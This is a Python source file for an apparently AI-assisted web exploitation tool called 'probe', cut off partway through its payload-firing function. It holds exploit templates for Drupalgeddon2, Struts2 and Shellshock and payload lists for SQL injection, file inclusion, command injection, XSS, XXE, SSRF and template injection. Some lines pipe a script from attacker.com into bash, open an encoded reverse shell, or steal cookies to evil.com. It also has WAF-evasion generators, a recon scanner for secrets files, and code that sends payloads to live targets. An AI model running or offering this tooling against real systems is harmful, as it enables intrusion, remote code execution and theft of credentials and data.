probe / app.py
wuhp's picture
Update app.py
99dbb05 verified
import asyncio
import httpx
import ssl
import csv
import time
import json
import base64
import hashlib
import re
import urllib.parse
import pandas as pd
import gradio as gr
from collections import defaultdict
from typing import Dict, List, Tuple, Any, Optional
from pydantic import BaseModel, Field
from datetime import datetime
import traceback
try:
from google import genai
from google.genai import types
GEMINI_AVAILABLE = True
except ImportError:
GEMINI_AVAILABLE = False
# ==============================================================================
# ENGINE CONTROLS & HEADERS
# ==============================================================================
MAX_CONCURRENT_RECON = 30
SCAN_TIMEOUT = 8.0
EXPLOIT_TIMEOUT = 15.0
MAX_FIX_ITERATIONS = 3 # Maximum attempts to fix/refine a payload
HTTP_HEADERS = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "text/html,application/json,*/*",
"Accept-Language": "en-US,en;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
}
# ==============================================================================
# METASPLOIT EXPLOIT TEMPLATES
# ==============================================================================
METASPLOIT_TEMPLATES = {
"drupal_drupalgeddon2": {
"name": "Drupal Drupalgeddon 2 RCE",
"description": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - RCE via form rendering",
"cve": "CVE-2018-7600",
"target_paths": ["/user/register", "/?q=user/register", "/user/password"],
"method": "POST",
"payload_template": {
"form_id": "user_register_form",
"mail[#post_render][]": "exec",
"mail[#type]": "markup",
"mail[#markup]": "{COMMAND}"
}
},
"joomla_http_header_rce": {
"name": "Joomla 3.0.0-3.4.6 RCE",
"description": "Joomla HTTP Header Unauthenticated Remote Code Execution",
"cve": "CVE-2015-8562",
"target_paths": ["/"],
"method": "GET",
"headers": {
"User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'"
}
},
"wordpress_xmlrpc_pingback": {
"name": "WordPress XML-RPC Pingback",
"description": "WordPress XML-RPC SSRF/Port Scanner",
"cve": "N/A",
"target_paths": ["/xmlrpc.php"],
"method": "POST",
"headers": {"Content-Type": "text/xml"},
"payload_template": """<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>{TARGET_URL}</string></value></param>
<param><value><string>{BLOG_URL}</string></value></param>
</params>
</methodCall>"""
},
"struts2_content_type": {
"name": "Apache Struts2 Content-Type RCE",
"description": "Apache Struts 2.3.5 - 2.3.31 / 2.5 - 2.5.10 RCE",
"cve": "CVE-2017-5638",
"target_paths": ["/"],
"method": "POST",
"headers": {
"Content-Type": "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
},
"shellshock": {
"name": "Shellshock (Bash Remote Code Execution)",
"description": "GNU Bash 4.3 and earlier Remote Code Execution",
"cve": "CVE-2014-6271",
"target_paths": ["/cgi-bin/status", "/cgi-bin/test.cgi", "/cgi-bin/admin.cgi"],
"method": "GET",
"headers": {
"User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'"
}
}
}
# ==============================================================================
# ADVANCED PAYLOAD LIBRARY (enriched)
# ==============================================================================
PAYLOAD_LIBRARY = {
"SQLi": {
"Time-Based Blind": [
"' OR SLEEP(5)--",
"' AND IF(1=1,SLEEP(5),0)--",
"'; WAITFOR DELAY '00:00:05'--",
"' OR pg_sleep(5)--",
"1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"' OR 1=1 AND SLEEP(5)--",
"\" OR SLEEP(5)--",
"1; SELECT SLEEP(5)--",
],
"Union-Based": [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,@@version,3--",
"' UNION SELECT table_name,NULL FROM information_schema.tables--",
"-1' UNION ALL SELECT NULL,concat(username,0x3a,password),NULL FROM users--",
"' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--",
"' UNION SELECT NULL,load_file('/etc/passwd'),NULL--",
],
"Error-Based": [
"' AND extractvalue(1,concat(0x7e,version()))--",
"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--",
"' OR 1=convert(int,(SELECT @@version))--",
"' AND updatexml(1,concat(0x7e,(SELECT database())),1)--",
"' AND exp(~(SELECT * FROM (SELECT user())a))--",
],
"Boolean-Based": [
"' AND '1'='1",
"' AND '1'='2",
"' AND SUBSTRING(@@version,1,1)='5'--",
"' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--",
"' AND (SELECT COUNT(*) FROM users)>0--",
"' OR EXISTS(SELECT * FROM users)--",
],
"Stacked-Queries": [
"'; INSERT INTO users VALUES('hacked','hacked')--",
"'; UPDATE users SET password='hacked' WHERE '1'='1'--",
"'; DROP TABLE users--",
"'; EXEC xp_cmdshell('whoami')--",
],
"WAF-Bypass": [
"' /*!OR*/ 1=1--",
"' OR/**/1=1--",
"' %4fR 1=1--",
"'/**/OR/**/1=1--",
"' oR sLeEp(5)--",
"' OR 0x31=0x31--",
],
},
"LFI": {
"Basic": [
"../../../../etc/passwd",
"..\\..\\..\\..\\windows\\win.ini",
"....//....//....//etc/passwd",
"..%2f..%2f..%2fetc%2fpasswd",
"/etc/passwd",
"../../etc/shadow",
"../../etc/hosts",
],
"Null-Byte": [
"../../../../etc/passwd%00",
"../../../../etc/passwd%00.jpg",
"../../../../etc/passwd\x00",
"../../../../etc/passwd%00.php",
],
"Encoding": [
"....%252f....%252f....%252fetc%252fpasswd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
"..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
"%252e%252e%252f%252e%252e%252fetc%252fpasswd",
"..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd",
],
"Filter-Bypass": [
"/var/www/../../etc/passwd",
r"....\/....\/....\/etc/passwd",
"/etc/passwd/.",
"php://filter/convert.base64-encode/resource=/etc/passwd",
],
"PHP-Wrappers": [
"php://filter/convert.base64-encode/resource=index.php",
"php://filter/read=string.rot13/resource=config.php",
"data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
"php://input",
"phar://./test.phar/test.txt",
"zip://shell.jpg%23payload.php",
"expect://id",
],
"Log-Poisoning": [
"/var/log/apache2/access.log",
"/var/log/nginx/access.log",
"/proc/self/environ",
"/proc/self/fd/0",
"/var/log/auth.log",
],
},
"RCE": {
"Command-Injection": [
"; id",
"| whoami",
"`uname -a`",
"$(cat /etc/passwd)",
"; curl http://attacker.com/shell.sh | bash",
"&& id",
"|| id",
"; ls -la /",
"\n id",
"%0a id",
],
"PHP-Exec": [
"<?php system($_GET['cmd']); ?>",
"<?php passthru($_GET['c']); ?>",
"<?php echo shell_exec('id'); ?>",
"<?php echo `id`; ?>",
"<?php proc_open('id',array(),$pipes); ?>",
],
"Encoded": [
"; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash",
"; ${IFS}id",
"; cat</etc/passwd",
"; {id}",
"$(IFS=,;cmd=id;$cmd)",
],
"Template-Injection": [
"{{7*7}}",
"${7*7}",
"#{7*7}",
"<%= 7*7 %>",
"{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
"${T(java.lang.Runtime).getRuntime().exec('id')}",
],
},
"XSS": {
"Reflected": [
"<script>alert(document.domain)</script>",
"<img src=x onerror=alert(1)>",
"<svg/onload=alert(1)>",
"'-alert(1)-'",
"<body onload=alert(1)>",
"\"><script>alert(1)</script>",
"'><img src=x onerror=alert(1)>",
],
"Stored": [
"<script>fetch('https://evil.com/?c='+document.cookie)</script>",
"<img src=x onerror=\"this.src='https://evil.com/?c='+btoa(document.cookie)\">",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
],
"DOM-Based": [
"javascript:alert(1)",
"#<script>alert(1)</script>",
"#\"><img src=x onerror=alert(1)>",
],
"Encoded": [
"%3Cscript%3Ealert(1)%3C/script%3E",
"&#60;script&#62;alert(1)&#60;/script&#62;",
"\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
"\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",
],
"Filter-Bypass": [
"<ScRiPt>alert(1)</sCrIpT>",
"<script src=//evil.com/x.js>",
"<iframe src=javascript:alert(1)>",
"<details open ontoggle=alert(1)>",
"<input autofocus onfocus=alert(1)>",
"<select onchange=alert(1)><option>1</option></select>",
],
},
"XXE": {
"Basic": [
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><root>&xxe;</root>',
],
"OOB": [
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]><root>test</root>',
'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>',
],
},
"SSRF": {
"Internal": [
"http://127.0.0.1",
"http://localhost",
"http://169.254.169.254/latest/meta-data/",
"http://[::1]",
"http://0.0.0.0",
"http://0177.0.0.1",
"http://2130706433",
],
"Cloud-Metadata": [
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://metadata.google.internal/computeMetadata/v1/",
"http://169.254.169.254/metadata/instance?api-version=2021-02-01",
],
"Protocol-Bypass": [
"file:///etc/passwd",
"dict://127.0.0.1:6379/info",
"gopher://127.0.0.1:9200/",
"sftp://attacker.com",
],
},
"NoSQLi": {
"MongoDB": [
'{"username": {"$ne": null}, "password": {"$ne": null}}',
'{"username": {"$gt": ""}, "password": {"$gt": ""}}',
"' || '1'=='1",
"username[$ne]=invalid&password[$ne]=invalid",
'{"$where": "sleep(5000)"}',
],
},
"SSTI": {
"Detection": [
"{{7*7}}",
"${7*7}",
"#{7*7}",
"<%= 7*7 %>",
"{{7*'7'}}",
],
"Jinja2-RCE": [
"{{''.__class__.__mro__[1].__subclasses__()}}",
"{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
"{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__'].eval(\"__import__('os').system('id')\") }}{%endif%}{%endfor%}",
],
},
}
# ==============================================================================
# PAYLOAD CODE TEMPLATES (improved with smarter generators)
# ==============================================================================
PAYLOAD_CODE_TEMPLATES = {
"SQLi_TimeBased": '''import urllib.parse
def generate_sqli_time_payload(delay=5, db_type="mysql", encoding=None, waf_bypass=False):
"""Generate time-based SQL injection payload with optional evasion."""
base = {
"mysql": f"' OR SLEEP({delay})--",
"mssql": f"'; WAITFOR DELAY '00:00:0{delay}'--",
"postgres": f"' OR pg_sleep({delay})--",
"oracle": f"' OR 1=1 AND dbms_pipe.receive_message(('a'),{delay}) IS NULL--",
}.get(db_type, f"' OR SLEEP({delay})--")
if waf_bypass:
# Inline comment evasion
base = base.replace(" ", "/**/")
if encoding == "url":
return urllib.parse.quote(base)
elif encoding == "double_url":
return urllib.parse.quote(urllib.parse.quote(base))
return base
# Usage
payload = generate_sqli_time_payload(delay=5, db_type="mysql", waf_bypass=True)
print(payload)
''',
"SQLi_Union": '''def generate_sqli_union(cols=3, target_col=2, target_expr="@@version", db_type="mysql"):
"""Generate UNION-based SQL injection for data extraction."""
nulls = ",".join(
target_expr if i == target_col else "NULL"
for i in range(1, cols + 1)
)
payload = f"' UNION SELECT {nulls}--"
if db_type == "postgres":
payload = f"' UNION SELECT {nulls}--"
elif db_type == "mssql":
payload = f"' UNION SELECT {nulls}--"
return payload
# Enumerate tables (MySQL)
print(generate_sqli_union(cols=3, target_col=2,
target_expr="group_concat(table_name)", db_type="mysql"))
# Get version
print(generate_sqli_union(cols=3, target_col=2, target_expr="@@version"))
''',
"LFI_Basic": '''import urllib.parse
def generate_lfi_payload(depth=4, target="etc/passwd", os_type="linux",
encoding=None, null_byte=False):
"""Generate LFI path traversal payload with encoding options."""
if os_type == "linux":
traversal = "../" * depth
raw = f"{traversal}{target}"
else:
traversal = "..\\\\" * depth
raw = f"{traversal}windows\\\\win.ini"
if null_byte:
raw += "%00"
if encoding == "url":
return urllib.parse.quote(raw, safe="")
elif encoding == "double_url":
return urllib.parse.quote(urllib.parse.quote(raw, safe=""), safe="")
elif encoding == "unicode":
return raw.replace("/", "%c0%af").replace(".", "%c0%ae")
elif encoding == "overlong":
return raw.replace("/", "%2f").replace(".", "%2e")
return raw
# Basic
print(generate_lfi_payload(depth=5, target="etc/passwd"))
# Null-byte bypass
print(generate_lfi_payload(depth=5, target="etc/passwd", null_byte=True))
# Double-URL encoded
print(generate_lfi_payload(depth=5, target="etc/passwd", encoding="double_url"))
''',
"LFI_PHP_Wrappers": '''def php_filter_payload(resource="index.php", encode="base64"):
"""Generate PHP wrapper LFI payloads."""
payloads = {
"base64": f"php://filter/convert.base64-encode/resource={resource}",
"rot13": f"php://filter/read=string.rot13/resource={resource}",
"zlib": f"php://filter/zlib.deflate/convert.base64-encode/resource={resource}",
"stdin": "php://input",
"data": "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
"expect": "expect://id",
"phar": "phar://./uploaded.phar/shell.php",
}
return payloads.get(encode, payloads["base64"])
def decode_base64_lfi(b64_string):
"""Decode base64-encoded file content from LFI response."""
import base64
try:
return base64.b64decode(b64_string).decode("utf-8", errors="replace")
except Exception as e:
return f"Decode error: {e}"
# Get source code of config file
print(php_filter_payload("config.php", "base64"))
# RCE via data wrapper
print(php_filter_payload(encode="data"))
''',
"RCE_CommandInjection": '''import urllib.parse
def generate_rce_payload(command="id", separator=";", encoding=None, bypass_spaces=False):
"""Generate OS command injection payload with evasion."""
if bypass_spaces:
command = command.replace(" ", "${IFS}")
separators = {
"semicolon": f"; {command}",
"pipe": f"| {command}",
"background": f"& {command}",
"or": f"|| {command}",
"and": f"&& {command}",
"newline": f"%0a{command}",
"backtick": f"`{command}`",
"subshell": f"$({command})",
}
raw = separators.get(separator, f"; {command}")
if encoding == "url":
return urllib.parse.quote(raw, safe="")
elif encoding == "double_url":
return urllib.parse.quote(urllib.parse.quote(raw, safe=""), safe="")
return raw
# Basic RCE
print(generate_rce_payload("whoami", "semicolon"))
# Space-bypass
print(generate_rce_payload("cat /etc/passwd", "subshell", bypass_spaces=True))
# URL-encoded newline injection
print(generate_rce_payload("id", "newline", encoding="url"))
''',
"XSS_Basic": '''def generate_xss_payload(context="html", bypass=False, exfil_url=None):
"""
Generate context-aware XSS payload.
context: html | attr | js | url
"""
base_payloads = {
"html": "<script>alert(document.domain)</script>",
"attr": "\" onmouseover=\"alert(1)",
"js": "';alert(1)//",
"url": "javascript:alert(1)",
"svg": "<svg/onload=alert(1)>",
"img": "<img src=x onerror=alert(1)>",
}
payload = base_payloads.get(context, base_payloads["html"])
if exfil_url:
payload = f"<script>fetch('{exfil_url}?c='+encodeURIComponent(document.cookie))</script>"
if bypass:
payload = payload.replace("<script", "<ScRiPt").replace("</script", "</sCrIpT")
return payload
# Basic reflected XSS
print(generate_xss_payload("html"))
# Attribute context
print(generate_xss_payload("attr"))
# Cookie stealer
print(generate_xss_payload(exfil_url="https://evil.com/log"))
# Case-bypass
print(generate_xss_payload("html", bypass=True))
''',
"SSTI_Detection": '''def generate_ssti_probes():
"""Generate SSTI detection probes for multiple template engines."""
probes = {
"Jinja2/Twig": "{{7*7}}", # expect: 49
"FreeMarker": "${7*7}", # expect: 49
"Velocity": "#set($x=7*7)$x", # expect: 49
"Smarty": "{7*7}", # expect: 49
"ERB (Ruby)": "<%= 7*7 %>", # expect: 49
"Pebble": "{{7*'7'}}", # Jinja2: 49, Twig: 7777777
"Mako": "${7*7}",
}
return probes
def generate_jinja2_rce(command="id"):
"""Generate Jinja2 RCE payload."""
return (
"{%for c in [].__class__.__base__.__subclasses__()%}"
"{%if c.__name__=='catch_warnings'%}"
"{{c.__init__.__globals__['__builtins__']"
f".eval(\"__import__('os').popen('{command}').read()\")"
"}}{%endif%}{%endfor%}"
)
for engine, probe in generate_ssti_probes().items():
print(f"{engine}: {probe}")
print("\\nRCE:", generate_jinja2_rce("id"))
''',
"Custom": '''import urllib.parse, base64, re
def generate_custom_payload(base_payload, encoding=None, evasion=None, prefix="", suffix=""):
"""
Flexible payload generator.
Args:
base_payload : The base attack string
encoding : url | double_url | base64 | html_entity | unicode_escape
evasion : case_variation | comment_insertion | whitespace_abuse | null_bytes
prefix/suffix: Wrap the final payload
"""
result = base_payload
# Evasion transforms (applied before encoding)
if evasion == "case_variation":
result = "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(result))
elif evasion == "comment_insertion":
result = result.replace(" ", "/**/")
elif evasion == "whitespace_abuse":
result = result.replace(" ", "%09") # tab
elif evasion == "null_bytes":
result = result.replace(" ", "%00 ")
# Encoding layer
if encoding == "url":
result = urllib.parse.quote(result, safe="")
elif encoding == "double_url":
result = urllib.parse.quote(urllib.parse.quote(result, safe=""), safe="")
elif encoding == "base64":
result = base64.b64encode(result.encode()).decode()
elif encoding == "html_entity":
result = "".join(f"&#{ord(c)};" for c in result)
elif encoding == "unicode_escape":
result = result.encode("unicode_escape").decode()
return f"{prefix}{result}{suffix}"
# Example: SQLi with comment-insertion WAF bypass
print(generate_custom_payload("' OR 1=1--", evasion="comment_insertion"))
# URL-encoded XSS
print(generate_custom_payload("<script>alert(1)</script>", encoding="url"))
# Double-URL LFI
print(generate_custom_payload("../../../../etc/passwd", encoding="double_url"))
'''
}
# ==============================================================================
# AI STRUCTURED OUTPUT SCHEMAS
# ==============================================================================
class VulnerabilityAnalysis(BaseModel):
vulnerability_type: str = Field(description="Primary vulnerability class (SQLi, LFI, RCE, XSS, SSTI, NoSQLi, etc.)")
confidence: str = Field(description="Confidence level: High, Medium, Low")
attack_vector: str = Field(description="Specific attack approach")
target_parameters: List[str] = Field(description="Vulnerable parameters or paths")
reasoning: str = Field(description="Technical reasoning for this assessment")
secondary_vulns: List[str] = Field(default=[], description="Other potential vulnerabilities to probe")
related_cves: List[str] = Field(default=[], description="Known CVEs that might apply")
class AttackStrategy(BaseModel):
vulnerability_class: str = Field(description="Class of vulnerability")
target_endpoint: str = Field(description="Specific endpoint and parameter")
strategy: str = Field(description="Attack methodology")
evasion_techniques: List[str] = Field(description="WAF/IDS evasion methods to apply")
expected_indicators: List[str] = Field(description="Success indicators to look for")
http_method: str = Field(default="GET", description="HTTP method to use: GET, POST, PUT")
content_type: str = Field(default="", description="Content-Type header if POST/PUT needed")
request_body_template: str = Field(default="", description="Body template for POST requests, use {PAYLOAD} placeholder")
metasploit_template: str = Field(default="", description="Metasploit template to use if applicable")
class PayloadGeneration(BaseModel):
payload: str = Field(description="The exact payload string")
code_template: str = Field(description="Python code to generate this payload")
encoding: str = Field(description="Encoding applied (none, url, double-url, base64, etc.)")
reasoning: str = Field(description="Why this payload is effective")
alternative_payloads: List[str] = Field(description="Backup payloads if primary fails")
http_method: str = Field(default="GET", description="HTTP method")
inject_in_body: bool = Field(default=False, description="True if payload goes in body, not URL")
content_type: str = Field(default="", description="Content-Type for body injection")
class ExploitAnalysis(BaseModel):
success: bool = Field(description="Whether exploit succeeded")
evidence: List[str] = Field(description="Evidence of successful exploitation")
next_steps: List[str] = Field(description="Recommended next actions")
data_extracted: str = Field(description="Any sensitive data found")
vuln_confirmed: str = Field(default="", description="Confirmed vulnerability type")
fix_suggestions: List[str] = Field(default=[], description="Suggestions to fix/improve the payload if it failed")
class CentaurChatResponse(BaseModel):
chat_reply: str = Field(description="Natural language response to operator")
suggested_endpoint: str = Field(description="Updated target endpoint")
suggested_payload: str = Field(description="Patched/generated payload")
suggested_code: str = Field(description="Python code to generate the payload")
technical_analysis: str = Field(description="Technical explanation of changes")
http_method: str = Field(default="GET", description="HTTP method to use")
class PayloadPatchResponse(BaseModel):
updated_code: str = Field(description="The patched Python code")
changes_made: List[str] = Field(description="List of specific changes applied")
explanation: str = Field(description="Explanation of why these changes help")
# ==============================================================================
# LOGGING SYSTEM
# ==============================================================================
class ExploitLogger:
def __init__(self):
self.logs = []
def log(self, level: str, message: str, context: dict = None):
entry = {
"timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3],
"level": level,
"message": message,
"context": context or {}
}
self.logs.append(entry)
return entry
def get_logs(self, level=None):
if level:
return [log for log in self.logs if log["level"] == level]
return self.logs
def format_logs(self):
formatted = []
for log in self.logs:
ctx = f" | {log['context']}" if log['context'] else ""
formatted.append(f"[{log['timestamp']}] {log['level']}: {log['message']}{ctx}")
return "\n".join(formatted)
def clear(self):
self.logs = []
exploit_logger = ExploitLogger()
# ==============================================================================
# RECON ENGINE
# ==============================================================================
class ReconProfile:
def __init__(self, host: str, port: int):
self.target_id = f"{host}:{port}"
self.host = host
self.port = port
self.protocol = "http"
self.is_alive = False
self.server_banner = "Unknown"
self.waf_detected = "None"
self.discovered_paths = []
self.error_signatures = []
self.technologies = []
self.cookies = {}
self.forms_found = []
self.api_endpoints = []
self.response_time_baseline = 0.0
self.redirect_chain = []
self.injectable_params = []
self.cms_detected = ""
@property
def is_exploitable(self):
return self.is_alive and (
len(self.discovered_paths) > 0 or
len(self.error_signatures) > 0 or
len(self.forms_found) > 0 or
len(self.api_endpoints) > 0 or
self.server_banner != "Unknown"
)
def to_dict(self):
return {
"target_id": self.target_id,
"protocol": self.protocol,
"server": self.server_banner,
"waf": self.waf_detected,
"cms": self.cms_detected,
"paths": len(self.discovered_paths),
"errors": len(self.error_signatures),
"forms": len(self.forms_found),
"apis": len(self.api_endpoints),
"tech": ", ".join(self.technologies[:3]),
}
class AdvancedReconEngine:
def __init__(self, profile: ReconProfile):
self.p = profile
self.client = httpx.AsyncClient(
verify=False,
timeout=SCAN_TIMEOUT,
headers=HTTP_HEADERS,
follow_redirects=True,
max_redirects=3
)
async def _detect_protocol(self):
try:
conf = ssl.create_default_context()
conf.check_hostname = False
conf.verify_mode = ssl.CERT_NONE
reader, writer = await asyncio.wait_for(
asyncio.open_connection(self.p.host, self.p.port, ssl=conf),
timeout=2.0
)
writer.close()
await writer.wait_closed()
self.p.protocol = "https"
except Exception:
self.p.protocol = "http"
def _url(self, path=""):
return f"{self.p.protocol}://{self.p.host}:{self.p.port}{path}"
async def _fingerprint_tech(self, response):
headers = response.headers
body = response.text.lower()
if "x-powered-by" in headers:
self.p.technologies.append(f"Powered-By: {headers['x-powered-by']}")
if "laravel" in body or "laravel_session" in str(response.cookies):
self.p.technologies.append("Laravel")
if "wordpress" in body or "wp-content" in body:
self.p.technologies.append("WordPress")
self.p.cms_detected = "WordPress"
if "django" in body or "csrftoken" in str(response.cookies):
self.p.technologies.append("Django")
if "express" in headers.get("x-powered-by", "").lower():
self.p.technologies.append("Express.js")
if "flask" in body or "werkzeug" in headers.get("server", "").lower():
self.p.technologies.append("Flask")
if "joomla" in body:
self.p.technologies.append("Joomla")
self.p.cms_detected = "Joomla"
if "drupal" in body:
self.p.technologies.append("Drupal")
self.p.cms_detected = "Drupal"
if "struts" in body or "struts" in headers.get("x-powered-by", "").lower():
self.p.technologies.append("Apache Struts")
waf_indicators = {
"cloudflare": ["cf-ray", "__cfduid"],
"akamai": ["akamai", "ak_bmsc"],
"aws-waf": ["x-amzn-trace-id", "x-amz-"],
"imperva": ["x-iinfo", "incap_ses"],
"f5": ["x-wa-info", "f5"],
"fortiweb": ["fortigate", "fortiweb"],
"modsecurity": ["mod_security", "modsec"],
}
for waf_name, indicators in waf_indicators.items():
if any(ind in str(headers).lower() for ind in indicators):
self.p.waf_detected = waf_name.upper()
break
async def _scan_paths(self):
paths = [
"/admin", "/administrator", "/admin.php", "/wp-admin", "/phpmyadmin",
"/cpanel", "/controlpanel", "/dashboard",
"/.env", "/.git/config", "/config.php", "/wp-config.php",
"/web.config", "/.htaccess", "/robots.txt", "/sitemap.xml",
"/api", "/api/v1", "/api/v2", "/graphql", "/rest",
"/api/users", "/api/admin", "/api/config",
"/upload", "/uploads", "/files", "/download",
"/search", "/login", "/logout", "/register",
"/?id=1", "/?user=admin", "/?file=index",
"/search?q=test", "/api/users?id=1",
"/index.php?page=home", "/?page=about",
"/xmlrpc.php", "/cgi-bin/status",
]
tasks = [self.client.get(self._url(p)) for p in paths]
results = await asyncio.gather(*tasks, return_exceptions=True)
for path, res in zip(paths, results):
if isinstance(res, Exception):
continue
if hasattr(res, 'history') and res.history:
self.p.redirect_chain.append(f"{path} -> {res.url}")
if res.status_code in [200, 401, 403, 405]:
if "?" not in path:
self.p.discovered_paths.append(path)
else:
self.p.api_endpoints.append(path)
params = re.findall(r'\?([^=]+)=|&([^=]+)=', path)
for p_match in params:
param = p_match[0] or p_match[1]
if param and param not in self.p.injectable_params:
self.p.injectable_params.append(param)
if "<form" in res.text.lower():
self.p.forms_found.append(path)
actions = re.findall(r'action=["\']([^"\']+)["\']', res.text, re.IGNORECASE)
inputs = re.findall(r'name=["\']([^"\']+)["\']', res.text, re.IGNORECASE)
for a in actions[:2]:
if a not in self.p.injectable_params:
self.p.injectable_params.append(f"form:{a}")
error_patterns = [
"sql syntax", "mysql", "postgresql", "mssql", "oracle error",
"syntax error", "database error", "query failed",
"stack trace", "traceback", "exception",
"warning:", "fatal error", "parse error",
"undefined index", "undefined variable",
"mysql_fetch", "pg_query", "sqlite",
"odbc", "jdbc", "ado.net",
]
body_lower = res.text.lower()
for pattern in error_patterns:
if pattern in body_lower:
self.p.error_signatures.append(f"{pattern.upper()} on {path}")
break
async def _measure_baseline(self):
try:
start = time.time()
await self.client.get(self._url("/"))
self.p.response_time_baseline = time.time() - start
except Exception:
self.p.response_time_baseline = 1.0
async def run(self):
await self._detect_protocol()
try:
resp = await self.client.get(self._url("/"))
self.p.is_alive = True
srv = resp.headers.get("Server", "")
if srv:
self.p.server_banner = srv
self.p.cookies = dict(resp.cookies)
await self._fingerprint_tech(resp)
await self._scan_paths()
await self._measure_baseline()
except Exception:
pass
finally:
await self.client.aclose()
return self.p
# ==============================================================================
# EXPLOIT ENGINE
# ==============================================================================
class ExploitResult:
def __init__(self):
self.success = False
self.status_code = 0
self.response_time = 0.0
self.response_body = ""
self.evidence = []
self.extracted_data = ""
async def advanced_payload_fire(protocol, host, port, endpoint, payload,
baseline=1.0, http_method="GET",
inject_in_body=False, content_type=""):
"""
Fire a payload against a target.
Supports GET (query-string or path), POST/PUT (body injection).
"""
result = ExploitResult()
if inject_in_body:
url = f"{protocol}://{host}:{port}{endpoint}"
body = payload
else:
url = f"{protocol}://{host}:{port}{endpoint}{payload}"
body = None
extra_headers = {}
if content_type:
extra_headers["Content-Type"] = content_type
exploit_logger.log("INFO", f"Firing {http_method} payload", {
"url": url[:120],
"method": http_method,
"body_len": len(body) if body else 0,
})
start = time.time()
try:
async with httpx.AsyncClient(
verify=False, timeout=EXPLOIT_TIMEOUT,
headers={**HTTP_HEADERS, **extra_headers}
) as client:
method_fn = {
"GET": client.get,
"POST": client.post,
"PUT": client.put,
"DELETE": client.delete,
}.get(http_method.upper(), client.get)
if http_method.upper() in ("POST", "PUT") and body:
resp = await method_fn(url, content=body)
else:
resp = await method_fn(url)
result.response_time = time.time() - start
result.status_code = resp.status_code
result.response_body = resp.text[:2000]
exploit_logger.log("INFO", "Response received", {
"status": resp.status_code,
"time": f"{result.response_time:.2f}s",
"size": len(resp.text),
})
# ---- Detection logic ----
body_lower = resp.text.lower()
# LFI
lfi_markers = ["root:x:0:0", "[boot loader]", "[extensions]", "uid=",
"gid=", "win.ini", "extension=", "for 16-bit app support",
"/bin/bash", "/bin/sh", "nobody:x:"]
for marker in lfi_markers:
if marker in resp.text:
result.success = True
result.evidence.append(f"LFI: '{marker}' found")
lines = [l for l in resp.text.split('\n') if l.strip()][:15]
result.extracted_data = '\n'.join(lines)
# Time-based SQLi
if (result.response_time > (baseline + 4.0) and
any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP", "DBMS_PIPE"])):
result.success = True
result.evidence.append(f"Time-Based SQLi: {result.response_time:.2f}s delay")
# SQL error leak
sql_errors = ["sql syntax", "mysql", "postgresql", "sqlite", "oracle",
"mssql", "syntax error at", "quoted string not properly terminated",
"unclosed quotation", "division by zero", "invalid column"]
for err in sql_errors:
if err in body_lower:
result.success = True
result.evidence.append(f"SQL Error: '{err}'")
# RCE / command output
rce_markers = ["uid=", "gid=", "groups=", "Linux version", "Windows NT",
"Microsoft Windows", "drwx", "total ", "/bin/bash",
"root@", "#", "SYSTEM", "nt authority"]
for marker in rce_markers:
if marker in resp.text:
result.success = True
result.evidence.append(f"RCE: '{marker}' found")
result.extracted_data = resp.text[:800]
# XXE
if "<?xml" in resp.text and ("root:" in resp.text or "<!DOCTYPE" in resp.text):
result.success = True
result.evidence.append("XXE: XML data leaked")
# XSS reflection
